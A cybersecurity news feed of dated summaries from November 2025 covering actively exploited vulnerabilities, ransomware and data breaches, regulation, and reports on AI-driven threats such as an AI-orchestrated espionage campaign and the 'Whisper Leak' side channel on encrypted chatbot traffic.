The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued follow-up implementation guidance for its September Emergency Directive 25-03, which addresses two critical, actively exploited vulnerabilities in Cisco ASA and Firepower devices. The flaws, a remote code execution bug (CVE-2025-20333) and a privilege escalation bug (CVE-2025-20362), are still being targeted by threat actors, including the China-linked group Storm-1849 (ArcaneDoor). CISA warns that many organizations incorrectly applied patches, leaving them vulnerable. The new guidance provides corrective actions and recommends further mitigation for devices that were not updated properly.

Nov 15, 20254 min read

Search Guard FLX Vulnerability (CVE-2025-12149) Allows DLS Bypass

A medium-severity information disclosure vulnerability, CVE-2025-12149, has been disclosed in floragunn's Search Guard FLX, a security plugin for Elasticsearch. The flaw, affecting versions up to 3.1.2, allows an attacker to bypass Document-Level Security (DLS) rules. This occurs specifically when a search is triggered from a Signals watch, an alerting component of the plugin. A low-privileged user who can create or trigger a watch could exploit this to access all documents in queried indices, exposing sensitive data that should be protected by DLS permissions.

Nov 15, 20253 min read

AWS Outage in us-east-1 Knocks Major Global Services Offline

A significant infrastructure fault within Amazon Web Services' (AWS) us-east-1 region in North Virginia on October 20, 2025, triggered a global outage affecting numerous major online services. Platforms including Snapchat, Fortnite, Disney Plus, and various banking applications experienced widespread disruptions. The incident, caused by issues with core services like DynamoDB and EC2, highlights the critical dependency of the digital economy on a few major cloud providers and underscores the importance of robust architectural resilience.

Nov 14, 20256 min read

Palo Alto Firewalls Vulnerable to Remote Reboot Attack via DoS Flaw

Palo Alto Networks has disclosed a medium-severity denial-of-service (DoS) vulnerability, CVE-2025-4619, affecting its PAN-OS software. The flaw enables an unauthenticated, remote attacker to reboot firewalls by sending specially crafted packets. Repeated exploitation can force the device into maintenance mode, disrupting network traffic and disabling security protections. The vulnerability impacts PA-Series and VM-Series firewalls with specific configurations. Patches are available and customers are urged to upgrade.

Nov 14, 20254 min read

Suspected GRU 'Fancy Bear' Hacker Linked to 2016 Election Interference Arrested in Thailand

A Russian national believed to be Aleksey Lukashev, a high-level military intelligence officer in Russia's GRU, has been arrested in Phuket, Thailand. The arrest was part of a joint operation between Thai authorities and the U.S. FBI. Lukashev is one of 12 GRU officers indicted by the U.S. Department of Justice in 2018 for his alleged role in the APT28 (Fancy Bear) hacking operations that targeted Democratic Party organizations during the 2016 U.S. election. He now faces extradition to the United States.

Nov 14, 20253 min read

Team Europe Wins Global Cybersecurity Challenge for Fourth Consecutive Year

For the fourth year in a row, Team Europe has won the International Cybersecurity Challenge (ICC), a prestigious global competition designed to showcase and develop young cybersecurity talent. The event, hosted in Tokyo, Japan, brought together teams from eight regions worldwide. Organized and supported by the EU Agency for Cybersecurity (ENISA), the victory highlights Europe's strong investment in nurturing the next generation of cybersecurity professionals. Team Asia and the US Cyber Team secured second and third place, respectively.

Nov 14, 20252 min read

Anthropic Disrupts First AI-Orchestrated Cyber Espionage Campaign

AI safety and research company Anthropic has reported disrupting what it believes is the first large-scale cyber espionage campaign orchestrated by an AI with a high degree of autonomy. The company detected a threat actor, assessed to be a Chinese state-sponsored group, manipulating its 'Claude Code' AI tool. The AI was used to attempt infiltration of approximately 30 global organizations, including tech companies, financial institutions, and government agencies. The incident marks a significant evolution in the use of AI in offensive cyber operations.

Nov 14, 20254 min read

New Tools From Legit Security and Cyware Tackle AI Code and Ops Risks

As AI adoption accelerates in software development and security, vendors are releasing new solutions to manage the inherent risks. Legit Security has launched 'VibeGuard,' a tool designed to secure AI-generated code within integrated development environments (IDEs). Simultaneously, Cyware has upgraded its 'Quarterback AI' platform to function as an 'AI Fabric' for security operations, aiming to boost threat intelligence and analyst productivity. These launches highlight the industry's focus on both securing AI's use and using AI for defense.

Nov 14, 20253 min read

Patch Now: Microsoft Scrambles to Fix Actively Exploited Windows Kernel Zero-Day

Microsoft has released its November 2025 Patch Tuesday updates, addressing 63 vulnerabilities, including a critical zero-day in the Windows Kernel (CVE-2025-62215) that is being actively exploited in the wild. This privilege escalation flaw allows local attackers to gain full SYSTEM-level control of affected Windows and Windows Server systems. Due to its active exploitation, CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating immediate patching for federal agencies. The update also fixes four other critical flaws, including a severe remote code execution vulnerability (CVE-2025-60724) in the Microsoft Graphics Component.

Nov 13, 20256 min read

GAME OVER: 'Operation Endgame' Dismantles Global Cybercrime Services

In a massive international crackdown dubbed 'Operation Endgame,' law enforcement agencies from 11 countries, coordinated by Europol, have dismantled the infrastructure of three major cybercrime-as-a-service platforms: the Rhadamanthys information stealer, the VenomRAT remote access trojan, and the Elysium botnet. The operation resulted in the seizure of over 1,025 servers, the takedown of 20 domains, and the arrest of the main suspect behind VenomRAT. The targeted malware was responsible for infecting hundreds of thousands of computers worldwide, stealing vast amounts of data, including millions in cryptocurrency.

Nov 13, 20255 min read

Synnovis Confirms Patient Data Stolen in Qilin Ransomware Attack on London Hospitals

Pathology service provider Synnovis has officially confirmed that patient personal data, including names, NHS numbers, and dates of birth, was stolen during the June 2024 ransomware attack attributed to the Qilin gang. The attack caused widespread disruption to London hospitals, leading to the cancellation of over 1,100 procedures. After a lengthy forensic investigation, Synnovis acknowledged the data breach, which followed the attackers leaking approximately 400GB of data. Affected NHS trusts are now beginning the process of notifying individual patients whose information was compromised.

Nov 13, 20256 min read

Retailers Unprepared for AI-Powered Cyberattack Tsunami, Report Warns

A new report from managed security provider LevelBlue reveals a troubling state of cybersecurity in the retail sector. The study found that 44% of retailers have experienced a significant increase in cyberattacks, with many feeling unprepared for the next wave of AI-powered threats. Despite 45% of executives expecting AI-driven attacks, only 25% believe their organization is ready to defend against them. The report also highlights major weaknesses in supply chain security, with nearly half of retailers admitting to having poor visibility into their suppliers' security practices, creating significant risk across the industry.

Nov 13, 20255 min read

Dell Patches Critical 9.1 CVSS Flaw in Data Lakehouse Platform

Dell has released a security update to address a critical vulnerability (CVE-2025-46608) in its Data Lakehouse platform, which received a CVSS score of 9.1. The flaw is an improper access control issue that could be exploited by a remote, high-privileged attacker to gain further elevated rights and potentially compromise the entire system. Due to the severity and the potential for a complete confidentiality, integrity, and availability loss, Dell is urging all customers to upgrade to version 1.6.0.0 immediately.

Nov 13, 20255 min read

CISA KEV Alert: WatchGuard and Triofox Flaws Now Under Active Attack

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, indicating they are under active attack. The additions include CVE-2025-9242, an out-of-bounds write flaw in WatchGuard Firebox appliances, and CVE-2025-12480, an improper access control vulnerability in Gladinet's Triofox product. The third is the recently disclosed Windows Kernel zero-day, CVE-2025-62215. Federal agencies are now mandated to patch these flaws by a specified deadline, and CISA strongly urges all organizations to prioritize remediation.

Nov 13, 20254 min read

Stealthy Phishing Attack Uses HTML Smuggling & Telegram Bots to Steal Credentials

A sophisticated phishing campaign is targeting organizations across Central and Eastern Europe, using HTML smuggling to deliver credential harvesting forms. Researchers at Cyble discovered the attack, which uses malicious HTML file attachments to bypass email security filters. Once a victim enters their credentials into the fake login page, an embedded JavaScript code exfiltrates the data directly to the attackers' private Telegram channels via the Telegram Bot API. This technique makes the campaign highly evasive, as it avoids the use of traditional, blockable C2 infrastructure.

Nov 13, 20255 min read

Microsoft Patches Actively Exploited Windows Kernel Zero-Day in November Patch Tuesday

Microsoft's November 2025 Patch Tuesday update addresses 63 vulnerabilities, including a critical Windows Kernel privilege escalation zero-day (CVE-2025-62215) that is being actively exploited in the wild. The flaw, which has a CVSS score of 7.0, allows a local attacker to gain SYSTEM-level privileges. The release also includes patches for four other critical vulnerabilities, notably a remote code execution flaw in the Microsoft Graphics Component (GDI+) with a CVSS score of 9.8 (CVE-2025-60724). Other significant fixes address high-severity issues in Windows Kerberos, Microsoft Office, and Visual Studio, requiring immediate attention from administrators to prevent potential system compromise and supply chain attacks.

Nov 12, 20255 min read

Advanced Threat Actor Exploits Cisco and Citrix Zero-Days in Targeted Attacks on Network Infrastructure

Amazon's threat intelligence team has discovered an advanced threat actor actively exploiting two previously undisclosed zero-day vulnerabilities in Cisco Identity Service Engine (ISE) and Citrix NetScaler Application Delivery Controllers (ADC). The vulnerabilities, now tracked as CVE-2025-20337 (Cisco) and CVE-2025-5777 (Citrix), are being used to target critical identity and network access control infrastructure. The attackers are leveraging custom malware to gain initial access and establish persistence on these edge devices. Both Cisco and Citrix have been notified and are working on patches, which security teams are urged to apply immediately upon release.

Nov 12, 20255 min read

UK Introduces Sweeping Cyber Security and Resilience Bill to Regulate MSPs and Mandate Stricter Breach Reporting

The UK government has introduced the Cyber Security and Resilience Bill to Parliament, a landmark piece of legislation set to replace the 2018 NIS Regulations. This new bill significantly expands the regulatory landscape by bringing Managed Service Providers (MSPs) into scope for the first time, a move impacting up to 1,100 firms. It also imposes stricter incident reporting rules, requiring an initial report within 24 hours and a full report within 72 hours. The legislation aims to bolster national security by strengthening supply chain resilience and aligning the UK with updated international standards like the EU's NIS2 Directive.

Nov 12, 20254 min read

Clop Ransomware Gang Claims Attack on Dartmouth College, Threatens to Leak Data

The notorious Clop ransomware gang has claimed responsibility for a cyberattack against Dartmouth College, an Ivy League university in the U.S. On November 11, 2025, the group added the institution to its dark web leak site, threatening to publish exfiltrated data if the university does not enter negotiations. This incident highlights the increasing trend of ransomware attacks targeting the education sector, which holds vast amounts of sensitive personal data. Dartmouth College has not yet issued a public statement on the alleged breach, but the threat from Clop is considered highly credible due to the group's track record.

Nov 12, 20255 min read

Iranian APT 'Ferocious Kitten' Continues to Target Dissidents With Custom MarkiRAT Surveillance Malware

The Iranian-aligned APT group 'Ferocious Kitten' continues its long-running cyber-espionage campaign against Iranian dissidents and activists, according to new research from Picus Security. Active since at least 2015, the group uses spear-phishing emails with malicious Office documents to deploy its custom remote access trojan (RAT), MarkiRAT. This malware is a sophisticated surveillance tool, featuring an advanced keylogger that activates only when password managers are not in use, clipboard hijacking, and data exfiltration over HTTP/S. The group also employs various defense evasion techniques, including the use of BITS and the RTLO trick to disguise malicious files.

Nov 12, 20255 min read

Critical Triofox Zero-Day Actively Exploited for System-Level Access

A critical, unauthenticated remote code execution vulnerability (CVE-2025-12480) in Gladinet's Triofox file-sharing platform is being actively exploited by a threat group tracked as UNC6485. The attackers are bypassing authentication by spoofing HTTP Host headers to 'localhost', allowing them to create rogue administrator accounts. They then abuse a built-in antivirus feature to execute malicious code with SYSTEM-level privileges, leading to full system compromise. Post-exploitation activity includes the deployment of commercial remote access tools like Zoho UEMS and AnyDesk to maintain persistence. Gladinet has released a patch, and organizations are urged to update immediately.

Nov 11, 20255 min read

KONNI APT Weaponizes Google's Find Hub for Destructive Attacks

The North Korea-linked threat group KONNI has been observed in a novel campaign targeting individuals in South Korea. The attackers use social engineering to deploy PC malware that steals Google account credentials. With these credentials, they access the victim's Google account and abuse the legitimate 'Find Hub' service (formerly Find My Device) to track the real-time location of the victim's Android phone and remotely trigger a factory reset, wiping all data. This campaign highlights the group's creativity in weaponizing legitimate services for destructive purposes.

Nov 11, 20255 min read

Pentagon Overhauls Cyber Force Model to Boost USCYBERCOM Readiness

The U.S. Department of War (DoW) has announced a new cyber force generation model aimed at enhancing the operational effectiveness, specialization, and lethality of forces assigned to U.S. Cyber Command (USCYBERCOM). The revised plan is designed to create a more integrated and agile cyber force by streamlining the processes of recruiting, training, and retaining personnel across all military branches. This strategic shift seeks to address emerging cyber threats and deter aggression in the cyber domain more effectively.

Nov 11, 20253 min read

Nikkei Slack Breach Exposes Data of 17,000 Users via Stolen Credentials

Japanese media giant Nikkei Inc., owner of the Financial Times, has disclosed a significant data breach affecting its internal Slack workspace. An attacker gained access using authentication credentials stolen from an employee's personal computer, which was infected with infostealer malware. The incident, which was detected in September 2025, exposed the names, email addresses, and chat histories of 17,368 employees and business partners. The breach highlights the persistent threat of infostealer malware and the security risks associated with credentials stored in web browsers.

Nov 11, 20254 min read

Hyundai IT Affiliate Discloses Major Data Breach Exposing PII and SSNs

Hyundai AutoEver America, the IT services subsidiary of the Hyundai Group, has begun notifying customers of a major data breach that occurred between late February and early March 2025. The incident involved unauthorized access to the company's IT environment, exposing highly sensitive personally identifiable information (PII), including full names, driver's license numbers, and Social Security numbers. While the exact number of victims is unconfirmed, the company's software is used in up to 2.7 million vehicles in North America, indicating a potentially massive scale.

Nov 11, 20254 min read

Cisco Firewalls Under Renewed Assault as New DoS Attack Variant Emerges

Cisco has issued an urgent security warning about a new denial-of-service (DoS) attack variant that is actively exploiting two previously patched vulnerabilities, CVE-2025-20333 and CVE-2025-20362, in its Secure Firewall ASA and FTD software. The campaign, which began on November 5, 2025, causes unpatched devices to enter a continuous reload loop, rendering them inoperable. This follows months of active exploitation by advanced threat actors, including a compromise of at least one US government agency. Cisco strongly urges all customers to apply the available patches immediately, as no effective workarounds exist.

Nov 11, 20256 min read

China's Cyber Arsenal Exposed: Knownsec Breach Leaks State Hacking Tools and Global Target Lists

A monumental data breach at Knownsec, a prominent Chinese cybersecurity firm with close government ties, has resulted in the exposure of over 12,000 classified documents. The leak, which occurred in early November 2025, provides an unprecedented view into China's offensive cyber capabilities, revealing a sophisticated arsenal of malware for multiple operating systems, custom hardware attack tools, and an extensive list of global espionage targets. The compromised data details large-scale data theft from countries including India, South Korea, and Taiwan, targeting critical infrastructure, government databases, and telecommunications networks, signaling a major intelligence failure for China's state-sponsored cyber operations.

Nov 10, 20256 min read

Swedish IT Supplier Breach Exposes Personal Data of 1.5 Million Citizens

The 'Datacarry' ransomware group has claimed responsibility for a major cyberattack on Miljödata, a Swedish IT supplier for local governments, exposing the sensitive personal data of up to 1.5 million people. The attack, which occurred in August 2025, targeted the company's HR systems, leading to the theft of names, government IDs, and contact information. The 224MB data archive was subsequently published on the dark web. The breach has caused service disruptions for numerous Swedish municipalities and affected data from major companies like SAS and Volvo. The incident is now under a national privacy investigation for potential GDPR violations.

Nov 10, 20255 min read

EU Governments Under Siege: ENISA Reports Massive Surge in DDoS and Data Attacks

A new threat landscape report from the EU Agency for Cybersecurity (ENISA) reveals that public administrations across the European Union are facing a dramatic increase in cyberattacks. DDoS attacks, largely driven by pro-Russia hacktivist groups like NoName057(16), account for 60% of all incidents, primarily targeting central governments. While disruptive, the report warns that data breaches (17.4%) and ransomware (10%) pose a more significant threat to the continuity of essential public services. ENISA also highlights ongoing espionage campaigns by Russian and Chinese state actors, and notes that the sector's immaturity under the new NIS2 Directive places it in a high-risk zone.

Nov 10, 20255 min read

It's Official: DoD Begins Phased Rollout of CMMC Cybersecurity Program

The U.S. Department of Defense (DoD) has officially started the phased, three-year implementation of its Cybersecurity Maturity Model Certification (CMMC) program as of November 10, 2025. DoD contracting officers can now begin inserting CMMC requirements into new solicitations for the Defense Industrial Base (DIB). The first phase requires contractors handling Federal Contract Information (FCI) or some Controlled Unclassified Information (CUI) to perform self-assessments. More stringent third-party certification requirements for higher CMMC levels will be introduced in subsequent phases, with full implementation expected by late 2028, fundamentally changing the security landscape for all DoD contractors.

Nov 10, 20254 min read

OWASP Top 10 for 2025 Released, Spotlighting Supply Chain and Design Flaws

The OWASP Foundation has released the 2025 release candidate for its influential Top 10 list of web application security risks. This update signals a major shift in focus, with the introduction of new categories like 'A03: Software Supply Chain Failures' and 'A10: Mishandling of Exceptional Conditions'. 'Broken Access Control' remains the top risk, but 'Security Misconfiguration' has climbed to the number two spot. The 2025 list emphasizes a move away from fixing individual bugs towards addressing systemic root causes like insecure design and dependency management, reflecting the modern threat landscape of complex, interconnected applications.

Nov 10, 20254 min read

Akira Ransomware Hits US Manufacturer Koch & Co., Threatens to Leak 54GB of Data

The Akira ransomware group has added U.S. manufacturer Koch & Co., Inc. to its list of victims. In a November 7 post on its dark web leak site, the group claimed to have stolen 54 gigabytes of sensitive corporate data, including detailed financials, contracts, and HR files. Akira is threatening to publish the data if a ransom is not paid. This attack is characteristic of Akira's double-extortion tactics, targeting mid-sized organizations with data exfiltration followed by encryption. Koch & Co. has not yet issued a public statement on the incident.

Nov 10, 20255 min read

OSCE Guide Urges Unified Cyber-Physical Defense for Critical Infrastructure

The Organization for Security and Cooperation in Europe (OSCE) has published a new technical guide advising governments and operators to adopt a unified approach to securing critical infrastructure. The guide emphasizes the growing convergence of physical and cybersecurity domains, warning that siloed security teams lack a holistic view of modern threats. It highlights how internet-connected Industrial Control Systems (ICS) have expanded the attack surface, making infrastructure vulnerable to remote cyberattacks. The document provides recommendations for integrating intrusion detection, access control, and insider threat management into a single, cohesive security framework.

Nov 10, 20254 min read

Microsoft 'Whisper Leak' Attack Can Spy on Encrypted AI Chats

Microsoft researchers have discovered a novel side-channel attack method named 'Whisper Leak' that undermines the privacy of encrypted AI chatbot conversations. By analyzing the size and timing of encrypted data packets from streaming Large Language Models (LLMs), a passive network observer can accurately infer the topic of a conversation. The proof-of-concept attack achieved over 98% accuracy against models from OpenAI, Mistral, xAI, and DeepSeek. While major AI providers have already implemented mitigations following a responsible disclosure, the finding exposes a fundamental privacy risk in the architecture of streaming LLMs, particularly for users in sensitive sectors like law and healthcare.

Nov 9, 20255 min read

Chinese-Made Electric Buses in Europe & Australia Pose Remote Shutdown Risk

Cybersecurity tests conducted in Norway on November 7, 2025, have uncovered a significant security risk in Chinese-manufactured Yutong electric buses, which are widely used across Europe and Australia. The 'Lion Cage' experiment demonstrated that the buses' connected systems could theoretically be accessed and disabled remotely by the manufacturer. The findings have triggered urgent security reviews by public transit authorities in multiple countries, highlighting the growing national security concerns surrounding internet-connected critical infrastructure and potential vulnerabilities in international supply chains.

Nov 9, 20255 min read

Philippines Lawmakers Push for National Cybersecurity Fund

In the Philippines, Representatives Migz and Luigi Villafuerte have introduced a proposal to create a 'Cybersecurity Risk Management and Mitigation Fund' (CRMMF). This dedicated national fund would provide the government with the necessary resources to prevent and respond to cyberattacks against both public and private sector entities. The proposal comes after recent DDoS attack attempts on local banks and designates 30% of the fund for rapid restoration of critical information infrastructure, signaling a strong political push to enhance the nation's cyber resilience.

Nov 9, 20254 min read

Critical Container Escape Flaws in runC Threaten Docker & Kubernetes

A security alert issued on November 9, 2025, warns of three new critical vulnerabilities in runC, the low-level container runtime used by Docker, Kubernetes, and other major container platforms. The flaws could allow a malicious actor to execute a 'container escape,' breaking out of the isolated container environment to gain unauthorized access to the underlying host operating system. A successful container escape is a worst-case scenario in cloud-native security, as it would allow an attacker to compromise all other containers on the host. Administrators of all containerized environments are urged to monitor for and apply patches immediately.

Nov 9, 20255 min read

Pwn2Own Day 1: Hackers Net $522K for 34 Zero-Days in SOHO Devices

The first day of Trend Micro's Pwn2Own Ireland 2025 competition was a resounding success for security researchers, who earned a total of $522,500 for demonstrating 34 unique zero-day vulnerabilities. In a stunning display, every single one of the 17 scheduled attempts against popular SOHO devices—including printers, NAS devices, and smart home products from brands like QNAP, Synology, Canon, and HP—was successful. The highlight was a complex 'SOHO Smashup' that chained eight bugs to compromise a router and a NAS device.

Nov 8, 20255 min read

Over 75% of Orgs Can't Keep Pace with AI-Powered Attacks, Survey Finds

A new survey from CrowdStrike reveals a stark reality: 76% of global organizations admit they cannot match the speed and sophistication of AI-powered cyberattacks. The 2025 State of Ransomware Survey highlights a dangerous 'confidence illusion,' where leaders believe they are prepared, yet 78% of their organizations were attacked in the past year. With adversaries using AI to accelerate attacks, 89% of security leaders now agree that AI-powered protection is essential to close the widening security gap and defend against modern threats.

Nov 8, 20255 min read

Malicious VS Code Extension with Ransomware Capabilities Discovered on Official Marketplace

A malicious Visual Studio (VS) Code extension named "susvsex" was discovered on the official VS Code Extension Marketplace. The extension, which appears to have been created with AI assistance, contained overt ransomware capabilities. Upon activation, it was designed to archive a target directory, exfiltrate the ZIP file to a remote server, and then encrypt the original files. The extension also used a private GitHub repository as a command-and-control channel. Although its default target was a test folder, it could easily be modified to target sensitive user data. Microsoft has since removed the extension, which was published on November 5, 2025.

Nov 8, 20255 min read

Data of Nearly 200,000 Supporters of Hungarian Party TISZA Leaked Online

The personal data of nearly 200,000 supporters of the Hungarian political party TISZA has been leaked and is being widely distributed online. The breach, which occurred in October 2025, originated from the party's "TISZA Világ" service. The compromised dataset, containing 198,500 records, has been added to the Have I Been Pwned service. Exposed information includes supporters' full names, email addresses, phone numbers, physical addresses, and usernames. This incident places affected individuals at significant risk of phishing, fraud, and other malicious targeting.

Nov 8, 20254 min read

Bahrain Fosters Digital Talent with AI and Cybersecurity Partnership

Bahrain is strengthening its national digital capabilities through a new partnership between Beyon Cyber, a cybersecurity firm, and Bahrain Polytechnic. The two organizations signed a Memorandum of Understanding (MoU) to foster innovation in Artificial Intelligence and cybersecurity. The collaboration aims to develop advanced, AI-driven security solutions and cultivate a skilled local workforce. This strategic initiative is aligned with Bahrain's goal of becoming a regional leader in technology and equipping its next generation of professionals with the skills to tackle modern cybersecurity challenges.

Nov 8, 20253 min read

Qilin Ransomware Strikes Again, Claiming Victims Across US, France, and Africa

The Qilin ransomware-as-a-service (RaaS) group has had a highly active month, listing numerous new victims on its data leak site. The group has claimed responsibility for attacks against a wide range of organizations in the U.S., France, and Africa. Victims include insurance providers, healthcare authorities, real estate firms, and French municipalities. This follows recent high-profile claims against two Texas electric cooperatives and Volkswagen Group Finance, demonstrating the group's broad targeting and operational capability, supported by resilient bulletproof hosting infrastructure.

Nov 8, 20255 min read

Cl0p Gang Exploits Oracle EBS Zero-Day in Massive Data Theft Spree

The Cl0p ransomware syndicate, also known as Graceful Spider, is actively exploiting a critical zero-day vulnerability, CVE-2025-61882, in Oracle's E-Business Suite (EBS). The flaw, which has a CVSS score of 9.8, allows for unauthenticated remote code execution and has been used to steal data from numerous organizations since at least August 2025. The attackers exfiltrated data for weeks before sending extortion demands in late September. In response, Oracle released an emergency patch on October 4, 2025, and CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating a patch deadline for federal agencies.

Nov 7, 20255 min read

SonicWall Breach Far Worse Than Feared: All Cloud Backup Users' Firewall Configs Stolen

**[SonicWall](https://www.sonicwall.com)** has issued a major update on a September data breach, revealing its impact is far more severe than initially disclosed. The company confirmed that an unauthorized party accessed and exfiltrated firewall configuration backups for **all** customers of its MySonicWall cloud backup service, a stark revision from the initial estimate of less than 5%. The stolen `.EXP` files contain complete firewall configurations, including security rules and encrypted credentials. While the credentials remain encrypted, security experts warn that possession of these files significantly lowers the bar for future targeted attacks. SonicWall, assisted by **[Mandiant](https://www.mandiant.com/)**, is urging all affected customers to reset passwords and follow detailed mitigation guidance.

Nov 7, 20255 min read

AI-Powered Social Engineering to Become Top Cyber Threat, ISACA Warns

A new report from the global IT association ISACA reveals a major shift in the threat landscape, with IT professionals now believing AI-driven social engineering will be the most significant cyber threat by 2026. The survey of 3,000 professionals found that 63% ranked this emerging threat highest, surpassing ransomware. Critically, the report also highlights a widespread lack of preparedness, with only 13% of organizations feeling 'very prepared' to manage the risks of generative AI, signaling an urgent need for new defense strategies and training.

Nov 7, 20256 min read

Massive 'I Paid Twice' Phishing Scheme Defrauds Booking.com Hotels and Guests

A sophisticated global phishing campaign named 'I Paid Twice' is targeting hotels on Booking.com and Expedia, compromising their administrative accounts to defraud guests. Since at least April 2025, attackers have been using social engineering and the PureRAT malware to gain access to hotel systems. Once in, they impersonate hotel staff to send fraudulent payment requests to travelers with upcoming reservations, tricking them into paying a second time via a malicious portal. Security firm Sekoia.io, which discovered the operation, reports that the campaign is highly active and has resulted in financial losses for an unknown number of victims.

Nov 7, 20255 min read

Samsung Zero-Day Exploited in the Wild to Install 'LANDFALL' Android Spyware

A now-patched zero-day vulnerability, CVE-2025-21042, in Samsung Galaxy devices was actively exploited to install a commercial-grade Android spyware known as LANDFALL. Researchers from Palo Alto Networks' Unit 42 discovered that attackers sent malicious DNG image files via WhatsApp to targets in the Middle East. The flaw, an out-of-bounds write in an image processing library, allowed for remote code execution. This incident highlights the growing trend of exploiting mobile image parsing libraries to deliver spyware, echoing similar attacks against Apple devices.

Nov 7, 20255 min read

State-Backed Hacking Escalates: Russia Targets Ukraine, China Eyes Latin America

A new report from ESET reveals a significant escalation in cyber operations by state-sponsored threat groups from Russia and China between April and September 2025. Russia-aligned groups, notably Sandworm, have accelerated destructive wiper malware attacks against Ukraine's critical infrastructure, including energy and logistics. Simultaneously, China-aligned actors like FamousSparrow have increased espionage activities targeting governmental entities in Latin America, potentially in response to shifting geopolitical dynamics. The report highlights a global landscape of heightened cyber conflict driven by national interests.

Nov 7, 20256 min read

Patient Sabotage: Malicious NuGet Packages with Time-Delayed ICS Payloads Discovered

Security researchers have discovered nine malicious packages on the NuGet repository, downloaded over 9,400 times, containing hidden, time-delayed sabotage code. One package, 'Sharp7Extend,' was specifically designed to corrupt write operations in industrial control systems (ICS) by silently causing them to fail after a grace period. This could lead to physical damage or production failures. The code was set to trigger on specific dates, some as far in the future as 2028, demonstrating a patient and highly destructive approach to supply chain attacks.

Nov 7, 20256 min read

Software Supply Chain Attacks Skyrocket to Record High, Driven by Ransomware Gangs

Software supply chain attacks reached an all-time high in October 2025, with 41 claimed incidents, according to a new report from Cyble. This figure is over 30% higher than the previous monthly record. Ransomware groups, particularly Qilin and Akira, are identified as the primary drivers of this trend, responsible for a majority of attacks in 2025. The information technology, finance, and energy sectors are the most heavily targeted, highlighting a strategic shift by attackers to compromise organizations through their trusted third-party suppliers.

Nov 7, 20255 min read

Amazon Patches High-Severity Flaw in WorkSpaces Linux Client

Amazon Web Services (AWS) has patched a high-severity vulnerability, CVE-2025-12779, in its WorkSpaces client for Linux. The flaw, rated 8.8 CVSS, could allow a local attacker on a shared computer to extract another user's authentication token and gain unauthorized access to their virtual desktop session. The issue affects Linux client versions 2023.0 through 2024.8. AWS has released a patched version and recommends all users upgrade immediately to mitigate the risk.

Nov 7, 20254 min read

CISA Adds Actively Exploited Control Web Panel RCE Flaw to KEV

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical command injection vulnerability in Control Web Panel (CWP), CVE-2025-48703, to its Known Exploited Vulnerabilities (KEV) catalog. The action confirms the flaw is being actively exploited in the wild. The vulnerability allows a remote, unauthenticated attacker to achieve remote code execution (RCE) on servers running the popular Linux web hosting panel. CISA has mandated that all Federal Civilian Executive Branch agencies patch the vulnerability by November 25, 2025, and strongly urges all other organizations to remediate it immediately.

Nov 6, 20255 min read

U.S. Congressional Budget Office Breached by Suspected Foreign Actor

The U.S. Congressional Budget Office (CBO), the nonpartisan agency that provides economic analysis to Congress, confirmed on November 6, 2025, that it suffered a significant cybersecurity breach. The attack is suspected to be the work of a foreign government, raising concerns about espionage and the potential exposure of sensitive, pre-decisional information. Data at risk includes confidential communications between lawmakers and CBO analysts, as well as early drafts of legislative cost analyses. The CBO has taken steps to contain the incident and is investigating the full scope of the compromise.

Nov 6, 20256 min read

Cisco Warns of New DoS Attacks Actively Exploiting Firewall Flaws

Cisco has issued an urgent warning about a new attack variant actively targeting its Secure Firewall products. Threat actors are chaining two previously disclosed vulnerabilities, CVE-2025-20333 and CVE-2025-20362, to cause a denial-of-service (DoS) condition on unpatched Adaptive Security Appliance (ASA) and Firewall Threat Defense (FTD) devices. These same flaws were exploited as zero-days in September 2025 and are listed in CISA's KEV catalog. Cisco strongly recommends that all customers immediately upgrade to patched software versions to prevent network outages and potential device compromise.

Nov 6, 20255 min read

Critical SQL Injection Flaw in Django Framework Puts Web Apps at Risk

The Django project has released urgent security updates to patch a critical SQL injection vulnerability, CVE-2025-64459, rated 9.1 on the CVSS scale. The flaw affects Django versions 4.2, 5.1, 5.2, and the 6.0 beta. It allows an attacker to manipulate database queries by passing a specially crafted dictionary to certain ORM methods, potentially leading to unauthorized data access, modification, or authentication bypass. Due to the widespread use of Django and the low complexity of the attack, developers are strongly urged to upgrade to the patched versions (4.2.26, 5.1.14, 5.2.8) immediately.

Nov 6, 20255 min read

Washington Post Confirms Breach in Cl0p's Oracle Supply Chain Attack

The Washington Post confirmed on November 6, 2025, that it was a victim of the widespread supply chain attack orchestrated by the Cl0p ransomware gang. The attack exploited a zero-day vulnerability in Oracle's E-Business Suite (EBS), a widely used enterprise software platform. This confirmation came after Cl0p added the newspaper to its dark web leak site, a classic extortion tactic. The incident highlights the significant risk of supply chain attacks, where a single vulnerability in a trusted third-party vendor's software can lead to the compromise of hundreds of high-profile organizations.

Nov 6, 20256 min read

Zscaler: 239 Malicious Apps on Google Play Downloaded 42 Million Times

A new report from Zscaler's ThreatLabz, published November 5, 2025, reveals a dramatic 67% year-over-year increase in Android malware. Researchers identified 239 malicious applications that successfully bypassed Google Play Store security, amassing a collective 42 million downloads before being removed. These apps often masqueraded as legitimate productivity 'Tools' to trick users. The report also highlights a dangerous trend in attacks against critical infrastructure, with the energy sector seeing a 387% surge in IoT/OT attacks, and significant increases in transportation and healthcare as well.

Nov 6, 20256 min read

Hackers Hijack Logistics Systems to Orchestrate Physical Cargo Heists

A new and growing form of hybrid crime is targeting the supply chain, where cybercriminals infiltrate freight and logistics companies to facilitate physical cargo theft. According to recent reports, threat actors compromise carrier systems, often using legitimate Remote Monitoring and Management (RMM) tools like ScreenConnect. Once inside, they manipulate digital 'load boards' to bid on and win real shipments. They then reroute the cargo to a location controlled by organized crime partners, leading to the theft of entire truckloads of goods. This trend highlights a critical vulnerability where the digital transformation of the logistics industry is being exploited to cause billions in real-world losses.

Nov 6, 20256 min read

CISA Adds Actively Exploited Gladinet and CWP Flaws to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, confirming they are under active attack. The flaws include an information disclosure bug in Gladinet CentreStack/Triofox (CVE-2025-11371) and an OS command injection vulnerability in CWP Control Web Panel (CVE-2025-48703). Under Binding Operational Directive (BOD) 22-01, federal agencies are mandated to patch these vulnerabilities by a specified deadline, and CISA strongly urges all organizations to prioritize remediation to defend against these active threats.

Nov 5, 20254 min read

